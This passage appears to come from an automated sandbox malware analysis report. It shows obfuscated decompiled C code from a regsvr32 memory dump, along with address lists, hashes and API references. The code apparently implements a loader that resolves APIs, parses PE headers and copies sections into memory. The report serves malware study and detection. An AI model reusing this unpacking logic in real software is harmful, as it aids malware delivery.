				_t514 = _t512 & 0x00000000 ^ _v20;
				if( *(_t493 + 0x4359ed) == 0) {
					_t421 =  *((intOrPtr*)(_t493 + 0x44105c))(_t514);
					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) & 0x00000000;
					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) | _t660 & 0x00000000 | _t421;
					_t660 = _t660;
					_t514 =  *_t672;
					_t672 =  &(_t672[1]);
				}
				_t587 =  *_t672;
				_t673 =  &(_t672[1]);
				if( *(_t493 + 0x4351b7) == 0) {
					_t421 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4352a0)), _t514);
					_v16 = _t514;
					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) & 0x00000000;
					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) | _t514 - _v16 | _t421;
					_pop( *_t261);
					_t514 = _v16;
				}
				_v12 = _t421;
				_t629 = _t627 & 0x00000000 | _t421 ^ _v12 | _t587;
				_push(_t493);
				do {
					_t425 =  *_t629 & 0x000000ff;
					_t629 = _t629 + 1;
					if(_t425 == 0) {
						goto L64;
					}
					_push(_t514);
					 *_t673 = 1;
					_t515 = _t629;
					 *_t266 = _t629;
					_push(_v20);
					_pop(_t567);
					_v8 = 8;
					do {
						asm("rol eax, cl");
						_t495 = _t425;
						_t425 = _t567;
						asm("ror ebx, cl");
						_t269 =  &_v8;
						 *_t269 = _v8 - 1;
					} while ( *_t269 != 0);
					 *_t673 = _t515;
					_t425 = _t495;
					 *_t271 = 0;
					_t514 = 0 ^ _v12;
					L64:
					asm("stosb");
					_t514 = _t514 - 1;
				} while (_t514 != 0);
				_pop( *_t273);
				_t497 = 0 ^ _v12;
				if( *((intOrPtr*)(_t497 + 0x4354f9)) == 0) {
					_t425 =  *((intOrPtr*)(_t497 + 0x4410a8))( *((intOrPtr*)(_t497 + 0x43541a)),  *((intOrPtr*)(_t497 + 0x4351cf)));
					 *_t279 = _t425;
					_push(_v12);
					_pop( *_t281);
				}
				if( *(_t497 + 0x435122) == 0) {
					_t283 = _t497 + 0x435182; // 0x435182
					if( *(_t497 + 0x4357e2) == 0) {
						_t446 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x435671)));
						_v12 = _t587;
						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) & 0x00000000;
						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) ^ _t587 - _v12 ^ _t446;
						_t587 = _v12;
					}
					_t425 =  *((intOrPtr*)(_t497 + 0x441064))();
					_v20 = _t567;
					 *(_t497 + 0x435122) = _t425;
					_t567 = _v20;
					if( *(_t497 + 0x4354ca) == 0) {
						_t425 =  *((intOrPtr*)(_t497 + 0x44105c))();
						 *_t673 = _t660;
						 *(_t497 + 0x4354ca) = _t425;
						_t660 = 0;
					}
				}
				if(_a4 != 0) {
					if( *(_t497 + 0x435250) == 0) {
						_t303 = _t497 + 0x4358c0; // 0x4358c0
						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t303);
						 *_t673 = _t629;
						 *(_t497 + 0x435250) = 0 ^ _t425;
						_t629 = 0;
					}
					if(_a8 != 0) {
						if( *(_t497 + 0x435213) == 0) {
							_t443 =  *((intOrPtr*)(_t497 + 0x441060))();
							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) & 0x00000000;
							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) | _t587 -  *_t673 ^ _t443;
							_t587 = _t587;
						}
						_t425 = E00191C5D(_t497, _t514, _t567, _t629, _a8, _a4);
					}
				}
				_pop( *_t315);
				_t568 = _v20;
				if( *(_t497 + 0x4352f3) == 0) {
					_t425 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x43531f)), _t568);
					_push(_t514);
					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) & 0x00000000;
					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) ^ (_t514 -  *_t673 | _t425);
					_t568 =  *_t673;
					_t673 = _t673 - 0xfffffffc;
				}
				if(_t568 > 0) {
					if( *(_t497 + 0x4354b6) == 0) {
						_t425 =  *((intOrPtr*)(_t497 + 0x4410a0))( *((intOrPtr*)(_t497 + 0x435088)),  *((intOrPtr*)(_t497 + 0x435412)),  *((intOrPtr*)(_t497 + 0x4355a1)), 0xd,  *((intOrPtr*)(_t497 + 0x43577e)),  *((intOrPtr*)(_t497 + 0x435298)), 0x400);
						_v12 = _t587;
						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) & 0x00000000;
						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) ^ (_t587 - _v12 | _t425);
					}
					_push(_a4);
					_pop( *_t339);
					_push(_v16);
					_pop(_t590);
					_push(_t590);
					 *_t673 = _t629;
					_t520 =  *(_t590 + 4);
					_t634 = 0;
					if( *(_t497 + 0x4350bc) == 0) {
						_t343 = _t497 + 0x4355b5; // 0x4355b5
						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t343, _t520);
						_push(0);
						 *_t673 = _t660;
						 *(_t497 + 0x4350bc) = 0 ^ _t425;
						_t520 =  *_t673;
						_t673 =  &(_t673[1]);
					}
					_v16 = _t497;
					_t427 = _t425 & 0x00000000 ^ _t497 & 0x00000000 ^  *(_t590 + 8);
					_t500 = _v16;
					if( *(_t500 + 0x435659) == 0) {
						_t441 =  *((intOrPtr*)(_t500 + 0x441060))();
						_v12 = _t590;
						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) & 0x00000000;
						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) ^ _t590 & 0x00000000 ^ _t441;
						_t590 = _v12;
						 *_t357 = _t520;
						_t520 = _t520 & 0x00000000 ^ _v12;
						 *_t359 = _t427;
						_t427 = _v16;
					}
					_push(_t520);
					_push(_t520);
					_v16 = _t634;
					_t570 = _t568 & 0x00000000 | _t634 ^ _v16 ^ _t427;
					_t637 = _v16;
					if( *(_t500 + 0x4353fa) == 0) {
						_t365 = _t500 + 0x43595c; // 0x43595c
						_t440 =  *((intOrPtr*)(_t500 + 0x44106c))(_t365, _t570);
						_v16 = _t590;
						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) & 0x00000000;
						 *(_t500 + 0x4353fa) =  *(_t500 + 0x4353fa) ^ (_t590 ^ _v16 | _t440);
						_t590 = _v16;
						_t570 = (_t570 & 0x00000000) +  *_t673;
						_t673 = _t673 - 0xfffffffc;
					}
					_v16 = _t520;
					_t639 = _t637 & 0x00000000 ^ _t520 - _v16 ^ _a8;
					_push( *_t673);
					 *_t673 =  *_t673 - _t570;
					_pop(_t525);
					if( *(_t500 + 0x435984) == 0) {
						_t379 = _t500 + 0x435829; // 0x435829
						_t438 =  *((intOrPtr*)(_t500 + 0x441064))(_t570, _t525);
						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) & 0x00000000;
						 *(_t500 + 0x435984) =  *(_t500 + 0x435984) | _t590 & 0x00000000 | _t438;
						_t590 = _t590;
						_t570 =  *_t673;
						_t673 = _t673 - 0xfffffffc;
						 *_t385 = _t379;
						_t525 = _t525 & 0x00000000 | _v12;
					}
					_t640 = _t639 + _t525;
					_t527 = _t525 & 0x00000000 ^ (_t500 -  *_t673 |  *(_t590 + 8));
					_t503 = _t500;
					if( *(_t503 + 0x43579a) == 0) {
						_t389 = _t503 + 0x4359c1; // 0x4359c1
						_t436 =  *((intOrPtr*)(_t503 + 0x441064))(_t527);
						_v16 = _t527;
						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) & 0x00000000;
						 *(_t503 + 0x43579a) =  *(_t503 + 0x43579a) ^ (_t527 & 0x00000000 | _t436);
						 *_t397 = _t389;
						_t570 = _t570 & 0x00000000 | _v12;
						 *_t399 = _t570;
						_t527 = _v20;
					}
					memcpy(_t590, _t640, _t527);
					_t676 =  &(_t673[3]);
					_t592 = _t640 + _t527 + _t527;
					_push(_a8);
					_pop( *_t402);
					_push(_v20);
					_pop(_t641);
					if( *(_t503 + 0x4352b7) == 0) {
						_t405 = _t503 + 0x435237; // 0x435237
						_t434 =  *((intOrPtr*)(_t503 + 0x441068))(_t405, _t570);
						_v20 = _t641;
						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) & 0x00000000;
						 *(_t503 + 0x4352b7) =  *(_t503 + 0x4352b7) ^ _t641 & 0x00000000 ^ _t434;
						_t641 = _v20;
						_t570 =  *_t676;
						_t676 = _t676 - 0xfffffffc;
					}
					_t677 = _t676 - 0xfffffffc;
					_push(0 ^  *_t676);
					 *_t677 =  *_t677 - _t570;
					_pop(_t531);
					_t429 = memcpy(_t592, _t641, _t531);
					_t678 = _t677 + 0xc;
					 *_t414 = _t429;
					_t629 =  *_t678;
					_t425 = memcpy(_t641 + _t531 + _t531 & 0x00000000 | _t429 ^  *_t678 | _a8, _t629, 0);
					_t673 =  &(_t678[4]);
					_t587 = _t629 + (0 | _v12) + (0 | _v12);
				}
				return _t425;
			}

0x00193726
0x00193726
0x00193726
0x00193726
0x00193726
0x00193733
0x0019373b
0x00193743
0x00193746
0x00193749
0x00193749
0x0019374f
0x0019375c
0x00193766
0x0019376e
0x00193775
0x0019377b
0x0019377e
0x00193781
0x00193781
0x00193784
0x00193785
0x00193792
0x00193795
0x0019379b
0x001937a3
0x001937aa
0x001937b0
0x001937b5
0x001937b8
0x001937b8
0x001937c3
0x001937c6
0x001937c9
0x001937d6
0x001937e5
0x001937e8
0x001937eb
0x001937eb
0x001937f1
0x001937f9
0x001937fb
0x00193808
0x00193818
0x0019381b
0x0019381e
0x0019382a
0x0019382d
0x0019382d
0x00193838
0x0019383b
0x0019383e
0x0019383e
0x00193844
0x0019384c
0x0019385a
0x00193866
0x0019386d
0x00193873
0x00193873
0x00193874
0x00193877
0x0019387a
0x0019387d
0x00193885
0x00193895
0x0019389b
0x001938a3
0x001938aa
0x001938b3
0x001938c0
0x001938c9
0x001938d5
0x001938dc
0x001938e2
0x001938e5
0x001938e8
0x001938e8
0x001938f1
0x001938f8
0x001938fe
0x001938fe
0x001938ff
0x00193907
0x00193909
0x00193913
0x0019391c
0x00193928
0x0019392f
0x00193935
0x00193935
0x0019393d
0x0019394a
0x0019394c
0x00193952
0x0019395a
0x00193961
0x00193967
0x00193967
0x0019396a
0x00193970
0x00193978
0x0019397f
0x0019398f
0x001939bd
0x001939c0
0x001939c3
0x001939c3
0x0019398f
0x001939c9
0x001939d3
0x001939dc
0x001939e2
0x001939ea
0x001939f1
0x001939f7
0x001939f7
0x001939fa
0x00193a02
0x00193a06
0x00193a0e
0x00193a15
0x00193a1b
0x00193a1b
0x00193a23
0x00193a2c
0x00193a30
0x00193a3c
0x00193a43
0x00193a49
0x00193a49
0x00193a4c
0x00193a59
0x00193a81
0x00193a84
0x00193a87
0x00193a8f
0x00193a92
0x00193a92
0x00193a96
0x00193a99
0x00193a9c
0x00193a9c
0x00193aa8
0x00193aab
0x00193ab8
0x00193aba
0x00193abb
0x00193ac3
0x00193acd
0x00193ad3
0x00193adb
0x00193ae2
0x00193af1
0x00193af4
0x00193af4
0x00193af7
0x00193b00
0x00193b06
0x00193b0e
0x00193b17
0x00193b1d
0x00193b25
0x00193b2c
0x00193b32
0x00193b32
0x00193b35
0x00193b3b
0x00193b44
0x00193b4d
0x00193b55
0x00193b5c
0x00193b62
0x00193b62
0x00193b63
0x00193b70
0x00193b7a
0x00193b86
0x00193b8d
0x00193b93
0x00193b93
0x00193b94
0x00193b96
0x00193ba3
0x00193bb1
0x00193bb7
0x00193bbf
0x00193bc6
0x00193bcc
0x00193bcc
0x00193bdb
0x00193be8
0x00193bf2
0x00193bfe
0x00193c05
0x00193c0b
0x00193c0c
0x00193c0f
0x00193c0f
0x00193c18
0x00193c1f
0x00193c25
0x00193c2c
0x00193c2f
0x00193c2f
0x00193c32
0x00193c32
0x00193c33
0x00193c33
0x00193c44
0x00193c50
0x00193c57
0x00193c5d
0x00193c65
0x00193c6d
0x00193c75
0x00193c7e
0x00193c8a
0x00193c91
0x00193c97
0x00193c97
0x00193c98
0x00193c9e
0x00193ca4
0x00193cab
0x00193cb9
0x00193cc2
0x00193cc8
0x00193cd0
0x00193cd7
0x00193cdd
0x00193cdd
0x00193cb9
0x00193ce6
0x00193ce9
0x00193cf3
0x00193cf6
0x00193d02
0x00193d09
0x00193d0f
0x00193d12
0x00193d15
0x00193d15
0x00193d1a
0x00193d1d
0x00193d27
0x00193d30
0x00193d36
0x00193d3e
0x00193d45
0x00193d50
0x00193d53
0x00193d53
0x00193d56
0x00193d61
0x00193d66
0x00193d67
0x00193d67
0x00193d6a
0x00193d6d
0x00000000
0x00000000
0x00193d6f
0x00193d71
0x00193d78
0x00193d7f
0x00193d82
0x00193d85
0x00193d86
0x00193d8d
0x00193d8d
0x00193d8f
0x00193d91
0x00193d93
0x00193d95
0x00193d95
0x00193d95
0x00193d9c
0x00193da3
0x00193da8
0x00193dab
0x00193dae
0x00193dae
0x00193daf
0x00193daf
0x00193db4
0x00193db7
0x00193dc1
0x00193dcf
0x00193dd6
0x00193dd9
0x00193ddc
0x00193ddc
0x00193de9
0x00193deb
0x00193df9
0x00193e01
0x00193e07
0x00193e0f
0x00193e16
0x00193e1c
0x00193e1c
0x00193e1f
0x00193e25
0x00193e2c
0x00193e32
0x00193e3c
0x00193e3e
0x00193e46
0x00193e4d
0x00193e53
0x00193e53
0x00193e3c
0x00193e58
0x00193e61
0x00193e63
0x00193e6a
0x00193e72
0x00193e79
0x00193e7f
0x00193e7f
0x00193e84
0x00193e8d
0x00193e8f
0x00193e9b
0x00193ea2
0x00193ea8
0x00193ea8
0x00193eaf
0x00193eaf
0x00193e84
0x00193eb4
0x00193eb7
0x00193ec1
0x00193eca
0x00193ed0
0x00193ed6
0x00193edd
0x00193eea
0x00193eed
0x00193eed
0x00193ef3
0x00193f00
0x00193f27
0x00193f2d
0x00193f35
0x00193f3c
0x00193f42
0x00193f45
0x00193f48
0x00193f4b
0x00193f4e
0x00193f4f
0x00193f52
0x00193f5a
0x00193f5c
0x00193f64
0x00193f67
0x00193f6e
0x00193f74
0x00193f76
0x00193f7d
0x00193f86
0x00193f89
0x00193f89
0x00193f8c
0x00193f98
0x00193f9a
0x00193fa4
0x00193fa8
0x00193fae
0x00193fb6
0x00193fbd
0x00193fc3
0x00193fcc
0x00193fcf
0x00193fd2
0x00193fd5
0x00193fd5
0x00193fd8
0x00193fd9
0x00193fda
0x00193fe5
0x00193fe7
0x00193ff1
0x00193ff4
0x00193ffb
0x00194001
0x00194009
0x00194010
0x00194016
0x0019401f
0x00194022
0x00194022
0x00194025
0x00194031
0x00194039
0x0019403a
0x0019403d
0x00194045
0x00194049
0x00194050
0x0019405c
0x00194063
0x00194069
0x0019406c
0x0019406f
0x00194078
0x0019407b
0x0019407b
0x0019407e
0x0019408a
0x0019408c
0x00194094
0x00194098
0x0019409f
0x001940a5
0x001940ad
0x001940b4
0x001940c3
0x001940c6
0x001940cb
0x001940ce
0x001940ce
0x001940d1
0x001940d1
0x001940d1
0x001940d3
0x001940d6
0x001940d9
0x001940dc
0x001940e4
0x001940e7
0x001940ee
0x001940f4
0x001940fc
0x00194103
0x00194109
0x0019410e
0x00194111
0x00194111
0x00194119
0x0019411c
0x0019411d
0x00194120
0x00194121
0x00194121
0x00194136
0x0019413e
0x00194144
0x00194144
0x00194144
0x00194144
0x0019415f

APIs

OleInitialize.OLE32(?,?,?,00000000,00000000), ref: 00193811

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
Instruction ID: b3bd210fdf52924aa83145b6f5f5f78f9e43cf15db9a95f6241ff58e80e38208
Opcode Fuzzy Hash: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
Instruction Fuzzy Hash: 32624C72800A04EFFF049FA0C889B9A7BB5FF24325F0851A9ED5D9E099D77415A4CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0019242A, Relevance: 2.1, APIs: 1, Instructions: 592
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E0019242A(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a36, char _a244) {
				signed int _v8;
				signed int _v12;
				signed int _t337;
				signed int _t339;
				void* _t346;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t357;
				signed int _t358;
				signed int _t361;
				void* _t364;
				void* _t365;
				signed int _t366;
				signed int _t368;
				signed int _t371;
				signed int _t374;
				signed int _t377;
				signed int _t379;
				signed int _t380;
				signed int _t382;
				signed int _t384;
				signed int _t388;
				signed int _t391;
				signed int _t392;
				signed int _t394;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed int _t404;
				signed int _t405;
				signed int _t408;
				signed int _t409;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t420;
				signed int _t423;
				signed int _t428;
				signed int _t431;
				signed int _t433;
				signed int _t454;
				signed int _t457;
				signed int _t479;
				signed int _t481;
				signed int _t484;
				void* _t486;
				signed int _t489;
				void* _t492;
				signed int _t500;
				signed int _t503;
				void* _t516;
				signed int _t523;
				signed int _t526;
				signed int _t529;
				void* _t531;
				signed int _t562;
				void* _t565;
				void* _t568;
				signed int* _t571;
				signed int* _t572;
				signed int* _t574;
				signed int* _t575;

				_t523 = __esi;
				_t479 = __edi;
				_t450 = __edx;
				_t426 = __ecx;
				_t417 = __ebx;
				if( *(__ebx + 0x4351c7) == 0) {
					_push(__ecx);
					_push(__edx);
					_push(__ebx + 0x4351ef);
					_t337 =  *((intOrPtr*)(__ebx + 0x44106c))();
					_v12 = __edx;
					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) & 0x00000000;
					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) | __edx ^ _v12 | _t337;
					_pop( *_t11);
					_t450 = _v12 & 0x00000000 ^ _v12;
					_pop( *_t13);
					_t426 = __ecx & 0x00000000 | _v12;
				}
				if( *(_t417 + 0x4352b0) == 0) {
					_push(_t426);
					_push(_t450);
					if( *(_t417 + 0x4355c5) == 0) {
						_t415 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x435914)));
						_v12 = _t523;
						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) & 0x00000000;
						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) | _t523 - _v12 | _t415;
						_t523 = _v12;
					}
					_t337 =  *((intOrPtr*)(_t417 + 0x441064))(_t417 + 0x4359f9);
					if( *(_t417 + 0x43523f) == 0) {
						_t413 =  *((intOrPtr*)(_t417 + 0x441060))(_t337);
						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) & 0x00000000;
						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) | _t479 -  *_t571 | _t413;
						_t479 = _t479;
						_t337 =  *_t571;
						_t571 =  &(_t571[1]);
					}
					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) & 0x00000000;
					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) | _t523 ^  *_t571 | _t337;
					_t523 = _t523;
					if( *(_t417 + 0x4351b3) == 0) {
						_t337 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x435978)),  *((intOrPtr*)(_t417 + 0x4356a9)));
						_push(_t426);
						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) & 0x00000000;
						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) ^ (_t426 & 0x00000000 | _t337);
					}
					_pop( *_t46);
					_t450 = _v12;
					_t426 =  *_t571;
					_t571 =  &(_t571[1]);
					if( *(_t417 + 0x4353c2) == 0) {
						_t337 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4352a8, _t450, _t426);
						_v12 = _t479;
						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) & 0x00000000;
						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) | _t479 - _v12 | _t337;
						_t479 = _v12;
						_t450 =  *_t571;
						_t575 =  &(_t571[1]);
						_t426 =  *_t575;
						_t571 = _t575 - 0xfffffffc;
					}
				}
				_push(_t450);
				_push(_t426);
				_t339 = _t337 & 0x00000000 ^ (_t523 ^  *_t571 | _a4);
				_t526 = _t523;
				if( *(_t417 + 0x43524c) == 0) {
					_t409 =  *((intOrPtr*)(_t417 + 0x44105c))();
					_v12 = _t450;
					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) & 0x00000000;
					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) ^ (_t450 & 0x00000000 | _t409);
					_t450 = _v12;
					 *_t67 = _t339;
					_t339 = 0 + _v12;
				}
				if( *(_t417 + 0x43539a) == 0) {
					_t404 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435020, _t417 + 0x435a31, _t339);
					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) & 0x00000000;
					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) ^ (_t479 & 0x00000000 | _t404);
					_t516 = _t479;
					_t405 =  *((intOrPtr*)(_t417 + 0x441060))();
					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) & 0x00000000;
					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) | _t516 -  *_t571 ^ _t405;
					_t479 = _t516;
					if( *(_t417 + 0x4355b1) == 0) {
						_t408 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x435068);
						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) & 0x00000000;
						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) ^ (_t426 ^  *_t571 | _t408);
						_t426 = _t426;
					}
					_t339 =  *_t571;
					_t571 = _t571 - 0xfffffffc;
				}
				 *_t93 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435669, _t417 + 0x4350e8, _t339 +  *((intOrPtr*)(_t339 + 0x3c)));
				_push(_v12);
				_pop( *_t95);
				_t572 = _t571 - 0xfffffffc;
				_push(0 ^  *_t571);
				_t346 = _t417 + 0x43517b;
				if( *(_t417 + 0x43525c) == 0) {
					_t400 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x4352d7)),  *((intOrPtr*)(_t417 + 0x43563d)), _t346);
					_v12 = _t450;
					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) & 0x00000000;
					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) ^ (_t450 - _v12 | _t400);
					_t450 = _v12;
					_t346 = (_t400 & 0x00000000) +  *_t572;
					_t572 = _t572 - 0xfffffffc;
				}
				_push(_t346);
				_t347 = _t417 + 0x435162;
				if( *(_t417 + 0x4357ee) == 0) {
					_t398 =  *((intOrPtr*)(_t417 + 0x441060))();
					_v12 = _t479;
					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) & 0x00000000;
					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) ^ _t479 - _v12 ^ _t398;
					_t479 = _v12;
					 *_t118 = _t347;
					_t347 = 0 + _v12;
				}
				_t348 =  *((intOrPtr*)(_t417 + 0x441044))();
				_v12 = _t526;
				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) & 0x00000000;
				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) | _t526 - _v12 ^ _t348;
				_t529 = _v12;
				 *_t128 = _t347;
				_t350 = 0 + _v12;
				if( *(_t417 + 0x4357de) == 0) {
					_t397 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4350d4, _t350);
					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) & 0x00000000;
					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) | _t450 -  *_t572 ^ _t397;
					_t450 = _t450;
					_pop( *_t137);
					_t350 = _v12;
				}
				_push(_t350);
				_v12 = _t450;
				_t481 = _t479 & 0x00000000 ^ (_t450 ^ _v12 | _t350);
				_t351 =  *(_t481 + 6) & 0x0000ffff;
				if( *(_t417 + 0x435579) == 0) {
					_t394 =  *((intOrPtr*)(_t417 + 0x4410a4))( *((intOrPtr*)(_t417 + 0x4352a4)), _t351);
					 *_t572 = _t529;
					 *(_t417 + 0x435579) = 0 ^ _t394;
					_t529 = 0;
					_t351 = 0 ^  *_t572;
					_t572 =  &(_t572[1]);
				}
				if( *((intOrPtr*)(_t417 + 0x435575)) == 0) {
					if( *(_t417 + 0x43534a) == 0) {
						_t392 =  *((intOrPtr*)(_t417 + 0x441060))(_t351);
						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) & 0x00000000;
						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) | _t529 -  *_t572 | _t392;
						_t529 = _t529;
						_t351 =  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					_push(_t351);
					_push(_t417 + 0x43573a);
					if( *(_t417 + 0x43580e) == 0) {
						_t391 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x43505c);
						_v12 = _t529;
						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) & 0x00000000;
						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) | _t529 & 0x00000000 | _t391;
						_t529 = _v12;
					}
					_t384 =  *((intOrPtr*)(_t417 + 0x441054))();
					if( *(_t417 + 0x435555) == 0) {
						_t388 =  *((intOrPtr*)(_t417 + 0x441060))(_t384);
						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) & 0x00000000;
						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) ^ _t426 ^  *_t572 ^ _t388;
						_t426 = _t426;
						_t384 = _t388 & 0x00000000 |  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					 *_t171 = _t384;
					_push(_v12);
					_pop( *_t173);
					if( *((intOrPtr*)(_t417 + 0x435716)) == 0) {
						 *_t177 =  *((intOrPtr*)(_t417 + 0x44106c))(_t417 + 0x4358e4);
						_push(_v12);
						_pop( *_t179);
					}
					_pop( *_t180);
					_t351 = 0 + _v12;
				}
				_v12 = _t481;
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t481 ^ _v12 | _t351);
				_t484 = _v12;
				if( *(_t417 + 0x43577a) == 0) {
					_t351 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x4351e3)));
					 *_t572 = _t484;
					 *(_t417 + 0x43577a) = _t351;
					_t484 = 0;
				}
				_push(_t484);
				if( *(_t417 + 0x435008) == 0) {
					_t351 =  *((intOrPtr*)(_t417 + 0x441058))();
					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) & 0x00000000;
					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) | _t529 & 0x00000000 ^ _t351;
					_t529 = _t529;
				}
				 *_t572 = _t417;
				_t454 = 0 ^  *(_t484 + 0x54);
				_t420 = 0;
				_v12 = _t351;
				_t486 = _t484 & 0x00000000 ^ (_t351 - _v12 |  *(_t420 + 0x4350b0));
				if( *(_t420 + 0x435156) == 0) {
					_t205 = _t420 + 0x435900; // 0x435900
					_t382 =  *((intOrPtr*)(_t420 + 0x44106c))(_t205, _t454);
					_v12 = _t486;
					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) & 0x00000000;
					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) | _t486 ^ _v12 | _t382;
					_t486 = _v12;
					_t454 =  *_t572;
					_t572 =  &(_t572[1]);
				}
				_t531 = _t529 & 0x00000000 | _t420 & 0x00000000 ^ _a4;
				_t423 = _t420;
				_t428 = _t426 & 0x00000000 ^ (_t562 & 0x00000000 | _t454);
				_t565 = _t562;
				if(_t486 == _t531) {
					L50:
					_pop( *_t258);
					if( *(_t423 + 0x4354c6) == 0) {
						_t371 =  *((intOrPtr*)(_t423 + 0x441058))();
						_v12 = _t531;
						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) & 0x00000000;
						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) ^ _t531 ^ _v12 ^ _t371;
						_t531 = _v12;
					}
					_t489 =  &_a244;
					_t568 = _t565;
					do {
						_t431 = _t428;
						_v12 = _t423;
						_t433 = _t431 & 0x00000000 | _t423 & 0x00000000 ^  *(_t489 + 0x10);
						_t423 = _v12;
						_t273 = _t423 + 0x4350ed; // 0x4350ed
						_t274 = _t423 + 0x43585d; // 0x43585d
						_t357 =  *((intOrPtr*)(_t423 + 0x441044))(_t274, _t273, _t433, _t489);
						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) & 0x00000000;
						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) | _t489 & 0x00000000 ^ _t357;
						_t492 = _t489;
						_t531 = (_t531 & 0x00000000 | _t428 & 0x00000000 | _a4) +  *((intOrPtr*)(_t492 + 0x14));
						_t358 = memcpy( *((intOrPtr*)(_t492 + 0xc)) +  *(_t423 + 0x4350b0), _t531, _t433 & 0x00000000 |  *_t572);
						_t572 =  &((_t572 - 0xfffffffc)[3]);
						_t428 = 0;
						if( *(_t423 + 0x435944) == 0) {
							_t284 = _t423 + 0x435a21; // 0x435a21
							_t358 =  *((intOrPtr*)(_t423 + 0x441054))(_t284);
							_v12 = _t531;
							 *(_t423 + 0x435944) = 0 ^ _t358;
							_t531 = _v12;
						}
						_pop( *_t289);
						_t489 =  &_a36;
						_t568 = _t568;
